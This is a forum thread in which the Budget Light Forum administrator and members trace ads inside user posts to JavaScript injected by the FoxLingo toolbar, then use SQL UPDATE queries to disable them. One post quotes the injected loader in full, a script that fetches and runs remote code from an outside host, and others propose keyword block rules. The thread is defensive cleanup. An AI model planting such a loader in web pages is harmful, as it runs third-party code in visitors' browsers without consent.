Ads on BLF???

61 replies [Last post]
scaru
scaru's picture
Offline
Last seen: 5 weeks 8 hours ago
Title: ★★★★★
Joined: 03/22/2012
Posts: 6904
Location: Virginia
Ok, so HKJ is putting ads on

Ok, so HKJ is putting ads on BLF with out Mr. Admin's permission. Are we sure that it is him and no one else? (Don't want to start a witch hunt unless we're sure)

PilotPTK
Offline
Last seen: 29 weeks 4 days ago
Title: ★★★★★
Joined: 09/04/2011
Posts: 1724
Location: Michigan, USA
Absolutely not sure. don’t

Absolutely not sure. don’t have access to the BLF database Smile

That said, I have not found any examples that were not HKJ.

__________________

I am currently extremely busy with work. Please do not expect a response from me quickly. I will be dropping in as time permits, but the amount of time I can dedicate to responding to topics and PMs is very limited.

scaru
scaru's picture
Offline
Last seen: 5 weeks 8 hours ago
Title: ★★★★★
Joined: 03/22/2012
Posts: 6904
Location: Virginia
PilotPTK wrote:Absolutely not

PilotPTK wrote:
Absolutely not sure. don't have access to the BLF database Smile That said, I have not found any examples that were not HKJ.

Ok, let's wait for sb to chime in on this issue. Smile

sb56637
sb56637's picture
Offline
Last seen: 5 hours 24 min ago
Title: ==Administrator==
Joined: 01/08/2010
Posts: 4460
Location: The Light
Hmm, thanks for the letting

Hmm, thanks for the letting me know. I’ll check into this.

__________________

Budget Light Forum ...where Frugal meets with Flashlight!

Pulsar13
Pulsar13's picture
Offline
Last seen: 35 min 12 sec ago
Title: ★★★★★
Joined: 02/05/2012
Posts: 1502
Location: Malaysia
Foxlingo ad showing on my

Foxlingo ad showing on my phone (opera mobile) too on both pages.

PilotPTK
Offline
Last seen: 29 weeks 4 days ago
Title: ★★★★★
Joined: 09/04/2011
Posts: 1724
Location: Michigan, USA
sb56637 wrote:Hmm, thanks for

sb56637 wrote:
Hmm, thanks for the letting me know. I’ll check into this.

suggest you run a (Select * FROM [PostContentTable] WHERE [POST_TEXT] LIKEjavascript’)

obviously, replacing [PostContentTable] with the table name that holds the actual posts and [POST_TEXT] with the column that holds the text of the posts

PPtk

__________________

I am currently extremely busy with work. Please do not expect a response from me quickly. I will be dropping in as time permits, but the amount of time I can dedicate to responding to topics and PMs is very limited.

Pulsar
Pulsar's picture
Offline
Last seen: 3 hours 31 min ago
Title: ★★★★★
Joined: 07/28/2011
Posts: 4907
Location: Maine
running linux using chrome, i

running linux using chrome, i got it on the links pptk posted also

PilotPTK
Offline
Last seen: 29 weeks 4 days ago
Title: ★★★★★
Joined: 09/04/2011
Posts: 1724
Location: Michigan, USA
It’s not just HKJ. Also

It’s not just HKJ. Also shows up in Viffer750’s post from this link
http://budgetlightforum.com/node/14251?page=3

Looking for a connection…

__________________

I am currently extremely busy with work. Please do not expect a response from me quickly. I will be dropping in as time permits, but the amount of time I can dedicate to responding to topics and PMs is very limited.

NightCrawl
Offline
Last seen: 13 weeks 6 days ago
Title: ★★★★★
Joined: 01/22/2012
Posts: 3044
Location: Karlsruhe, Germany
If you click

If you click this:

http://budgetlightforum.com/comment/reply/13371/232507?quote=1#comment-form

and disable rich-text, you can see it.

sb56637
sb56637's picture
Offline
Last seen: 5 hours 24 min ago
Title: ==Administrator==
Joined: 01/08/2010
Posts: 4460
Location: The Light
I strongly suspect that those

I strongly suspect that those ads were injected into the users’ posts without their knowledge by the Foxlingo toolbar. I’ll check into it some more.

__________________

Budget Light Forum ...where Frugal meets with Flashlight!

scaru
scaru's picture
Offline
Last seen: 5 weeks 8 hours ago
Title: ★★★★★
Joined: 03/22/2012
Posts: 6904
Location: Virginia
NightCrawl wrote:If you click

NightCrawl wrote:

If you click this:

http://budgetlightforum.com/comment/reply/13371/232507?quote=1#comment-form

and disable rich-text, you can see it.

You're right, my guess is it is a "virus" of some sort that is doing it since it is more than one person. 

Edit: Sb beat me to it. Wink I'll throw out this link, where people were having trouble with foxlingo crashing things etc. 

http://www.mywot.com/en/scorecard/foxlingo.com

PilotPTK
Offline
Last seen: 29 weeks 4 days ago
Title: ★★★★★
Joined: 09/04/2011
Posts: 1724
Location: Michigan, USA
sb56637 wrote:I strongly

sb56637 wrote:
I strongly suspect that those ads were injected into the users’ posts without their knowledge by the Foxlingo toolbar. I’ll check into it some more.

I was just about to say the same thing. Looks like it’s not their ‘fault’. They’re just lax in system security, and are being taken advantage of by the FoxLingo toolbar…

PPtk

Ref: http://wordpress.org/support/topic/appears-after-url-and-unknown-script-…

FoxLingo automatically injecting JavaScript code into edited HTML (JavaScript is launching the Ad, Posts on this forum are HTML)

__________________

I am currently extremely busy with work. Please do not expect a response from me quickly. I will be dropping in as time permits, but the amount of time I can dedicate to responding to topics and PMs is very limited.

ChiggerPepi
ChiggerPepi's picture
Offline
Last seen: 4 hours 16 min ago
Title: ★★★
Joined: 08/20/2012
Posts: 546
Location: Big Island, Hawaii
PilotPTK wrote:sb56637

PilotPTK wrote:
sb56637 wrote:
I strongly suspect that those ads were injected into the users’ posts without their knowledge by the Foxlingo toolbar. I’ll check into it some more.

I was just about to say the same thing. Looks like it’s not their ‘fault’. They’re just lax in system security, and are being taken advantage of by the FoxLingo toolbar…

PPtk

Ref: http://wordpress.org/support/topic/appears-after-url-and-unknown-script-…

FoxLingo automatically injecting JavaScript code into edited HTML (JavaScript is launching the Ad, Posts on this forum are HTML)

Just gonna put it out there that I hate browser toolbars or any other “force it down your throat” crap that comes with the program you’re trying to install.

I DON’T WANT IT!

Likely you guys are right on this one.

sb56637
sb56637's picture
Offline
Last seen: 5 hours 24 min ago
Title: ==Administrator==
Joined: 01/08/2010
Posts: 4460
Location: The Light
PilotPTK wrote:sb56637

PilotPTK wrote:
sb56637 wrote:
Hmm, thanks for the letting me know. I’ll check into this.

suggest you run a (Select * FROM [PostContentTable] WHERE [POST_TEXT] LIKEjavascript’)

obviously, replacing [PostContentTable] with the table name that holds the actual posts and [POST_TEXT] with the column that holds the text of the posts

PPtk

Thanks very mich PPtk. For a website admin I am shockingly ignorant about SQL queries.

Could you please help me with a query in the comments table to replace all occurences of example.com with example.com? I want to disable all of those ads by editing the link to their adserver, but I still want to leave the evidence for later investigation.

__________________

Budget Light Forum ...where Frugal meets with Flashlight!

PilotPTK
Offline
Last seen: 29 weeks 4 days ago
Title: ★★★★★
Joined: 09/04/2011
Posts: 1724
Location: Michigan, USA
sb56637 wrote:PilotPTK

sb56637 wrote:
PilotPTK wrote:
sb56637 wrote:
Hmm, thanks for the letting me know. I’ll check into this.

suggest you run a (Select * FROM [PostContentTable] WHERE [POST_TEXT] LIKEjavascript’)

obviously, replacing [PostContentTable] with the table name that holds the actual posts and [POST_TEXT] with the column that holds the text of the posts

PPtk

Thanks very mich PPtk. For a website admin I am shockingly ignorant about SQL queries.

Could you please help me with a query in the comments table to replace all occurences of example.com with example.com? I want to disable all of those ads by editing the link to their adserver, but I still want to leave the evidence for later investigation.

UPDATE [COMMENTS_TABLE] SET [COMMENT_TEXT]=REPLACE([COMMENT_TEXT], 'example.com', 'example.com') WHERE [COMMENT_TEXT] LIKE '%example.com%'

Again, replace [COMMENTS_TABLE] with the table name and [COMMENT_TEXT] with the column name where the actual post text is located.

PPtk

Don’t Do It! Its not showing up correctly! Don’t Do what I Just said… Standby.

__________________

I am currently extremely busy with work. Please do not expect a response from me quickly. I will be dropping in as time permits, but the amount of time I can dedicate to responding to topics and PMs is very limited.

sb56637
sb56637's picture
Offline
Last seen: 5 hours 24 min ago
Title: ==Administrator==
Joined: 01/08/2010
Posts: 4460
Location: The Light
PilotPTK wrote: Don’t Do

PilotPTK wrote:

Don’t Do It! Its not showing up correctly! Don’t Do what I Just said… Standby.

No worries, I didn’t run anything yet. What isn’t showing up correctly?

__________________

Budget Light Forum ...where Frugal meets with Flashlight!

PilotPTK
Offline
Last seen: 29 weeks 4 days ago
Title: ★★★★★
Joined: 09/04/2011
Posts: 1724
Location: Michigan, USA
There is “stuff” after the

There is “stuff” after the word REPLACE that isn’t showing up..

Click This
http://budgetlightforum.com/comment/reply/16860/293043?quote=1#comment-form

And you’ll see it in the quote.. Just grab it from there and run it.

__________________

I am currently extremely busy with work. Please do not expect a response from me quickly. I will be dropping in as time permits, but the amount of time I can dedicate to responding to topics and PMs is very limited.

sb56637
sb56637's picture
Offline
Last seen: 5 hours 24 min ago
Title: ==Administrator==
Joined: 01/08/2010
Posts: 4460
Location: The Light
PilotPTK wrote:There is

PilotPTK wrote:
There is “stuff” after the word REPLACE that isn’t showing up..

Click This
http://budgetlightforum.com/comment/reply/16860/293043?quote=1#comment-form

And you’ll see it in the quote.. Just grab it from there and run it.

Ah, I see. Nice catch. You can enclose code segments in marks like this@ so the filter system doesn’t modify it.

__________________

Budget Light Forum ...where Frugal meets with Flashlight!

scaru
scaru's picture
Offline
Last seen: 5 weeks 8 hours ago
Title: ★★★★★
Joined: 03/22/2012
Posts: 6904
Location: Virginia
sb56637 wrote:PilotPTK

sb56637 wrote:
PilotPTK wrote:
There is "stuff" after the word REPLACE that isn't showing up.. Click This http://budgetlightforum.com/comment/reply/16860/293043?quote=1#comment-form And you'll see it in the quote.. Just grab it from there and run it.
Ah, I see. Nice catch. You can enclose code segments in @ marks @like this@ so the filter system doesn't modify it.

But your @ marks didn't show up there. Wink

PilotPTK
Offline
Last seen: 29 weeks 4 days ago
Title: ★★★★★
Joined: 09/04/2011
Posts: 1724
Location: Michigan, USA
sb56637 wrote:PilotPTK

sb56637 wrote:
PilotPTK wrote:
There is “stuff” after the word REPLACE that isn’t showing up..

Click This
http://budgetlightforum.com/comment/reply/16860/293043?quote=1#comment-form

And you’ll see it in the quote.. Just grab it from there and run it.

Ah, I see. Nice catch. You can enclose code segments in marks like this@ so the filter system doesn’t modify it.

Gotcha. I’m not use to Drupal. I tried enclosing it in [CODE] and [/CODE] tags, which didn’t work..
I updated the original post so that it’s correct for historical reference.

__________________

I am currently extremely busy with work. Please do not expect a response from me quickly. I will be dropping in as time permits, but the amount of time I can dedicate to responding to topics and PMs is very limited.

NightCrawl
Offline
Last seen: 13 weeks 6 days ago
Title: ★★★★★
Joined: 01/22/2012
Posts: 3044
Location: Karlsruhe, Germany
This board could use  a

This board could use  a [code][/code] feature.. and an "ignorance" mode for that javascript stuff. Tongue

@<script id="FoxLingoJs" type="text/javascript">// <![CDATA[
!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//example.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();
// ]]></script>@

But @@ works.. kinda. Didnt quite work on the admins post scaru quoted.

PilotPTK
Offline
Last seen: 29 weeks 4 days ago
Title: ★★★★★
Joined: 09/04/2011
Posts: 1724
Location: Michigan, USA
To prevent this in the

To prevent this in the future, adding the word “javascript” to the “Bad Words” list in Drupal should do the trick.

__________________

I am currently extremely busy with work. Please do not expect a response from me quickly. I will be dropping in as time permits, but the amount of time I can dedicate to responding to topics and PMs is very limited.

scaru
scaru's picture
Offline
Last seen: 5 weeks 8 hours ago
Title: ★★★★★
Joined: 03/22/2012
Posts: 6904
Location: Virginia
PilotPTK wrote:To prevent

PilotPTK wrote:
To prevent this in the future, adding the word "javascript" to the "Bad Words" list in Drupal should do the trick.

Couldn't he just add something more specific like "script id=" so that java code wouldn't work, but people could still say the word javascript. 

PilotPTK
Offline
Last seen: 29 weeks 4 days ago
Title: ★★★★★
Joined: 09/04/2011
Posts: 1724
Location: Michigan, USA
scaru wrote:PilotPTK wrote:To

scaru wrote:

PilotPTK wrote:
To prevent this in the future, adding the word “javascript” to the “Bad Words” list in Drupal should do the trick.

Couldn’t he just add something more specific like “script id=” so that java code wouldn’t work, but people could still say the word javascript. 

Yeah. I suppose. Who would want to say javascript (Bleh) though? Smile

In most cases, javascript is the problem, not the solution.

__________________

I am currently extremely busy with work. Please do not expect a response from me quickly. I will be dropping in as time permits, but the amount of time I can dedicate to responding to topics and PMs is very limited.

sb56637
sb56637's picture
Offline
Last seen: 5 hours 24 min ago
Title: ==Administrator==
Joined: 01/08/2010
Posts: 4460
Location: The Light
PilotPTK wrote:To prevent

PilotPTK wrote:
To prevent this in the future, adding the word “javascript” to the “Bad Words” list in Drupal should do the trick.

The thing is, many of our users like to do beamshots with mouseover comparisons, which would also be eliminated.

__________________

Budget Light Forum ...where Frugal meets with Flashlight!

scaru
scaru's picture
Offline
Last seen: 5 weeks 8 hours ago
Title: ★★★★★
Joined: 03/22/2012
Posts: 6904
Location: Virginia
sb56637 wrote:PilotPTK

sb56637 wrote:
PilotPTK wrote:
To prevent this in the future, adding the word "javascript" to the "Bad Words" list in Drupal should do the trick.
The thing is, many of our users like to do beamshots with mouseover comparisons, which would also be eliminated.

Oh, in that case (I use them to) maybe just block "foxlingo" to atleast stop these ads. 

PilotPTK
Offline
Last seen: 29 weeks 4 days ago
Title: ★★★★★
Joined: 09/04/2011
Posts: 1724
Location: Michigan, USA
Looks like you did the update

Looks like you did the update to example.com… How long did that update query take to run? How many records modified? Just curious..

__________________

I am currently extremely busy with work. Please do not expect a response from me quickly. I will be dropping in as time permits, but the amount of time I can dedicate to responding to topics and PMs is very limited.

sb56637
sb56637's picture
Offline
Last seen: 5 hours 24 min ago
Title: ==Administrator==
Joined: 01/08/2010
Posts: 4460
Location: The Light
PilotPTK wrote:Looks like you

PilotPTK wrote:
Looks like you did the update to example.com… How long did that update query take to run? How many records modified? Just curious..

Worked great, thanks! 25 records were modified.

So, after the two affected users are notified, I would like to remove the whole script. How can I do that with an SQL query? I’m sure many of those characters need to be escaped somehow. Here’s the original offending code: http://pastebin.com/FGNr0dZH

Thanks a ton for the technical support PilotPTK!

__________________

Budget Light Forum ...where Frugal meets with Flashlight!

PilotPTK
Offline
Last seen: 29 weeks 4 days ago
Title: ★★★★★
Joined: 09/04/2011
Posts: 1724
Location: Michigan, USA
My pleasure sb, Removing

My pleasure sb,

Removing the entire offending code is a little more complex. I’d have to see exactly how it looks in the actual SQL return.

If it’s pointing to example.com now, it’s really pretty harmless.. I’m not sure I’d even waste the time cleaning up those 25 posts..

__________________

I am currently extremely busy with work. Please do not expect a response from me quickly. I will be dropping in as time permits, but the amount of time I can dedicate to responding to topics and PMs is very limited.

FlashPilot
FlashPilot's picture
Offline
Last seen: 4 hours 40 min ago
Title: ★★★★★
Joined: 05/10/2010
Posts: 3399
Location: USA
Blinders wrote:ezarc wrote:I

Blinders wrote:
ezarc wrote:
I have ads (when AdBlock is turned off)

Whats more interesting to me is that you have 15 BLF tabs open :bigsmile:

Wow, 15 BLF tabs open.. So YOURE the reason I keep getting the DRUPAL error…

LMAO! Very disturbing indeed! Big smile

Comment viewing options

Select your preferred way to display the comments and click "Save settings" to activate your changes.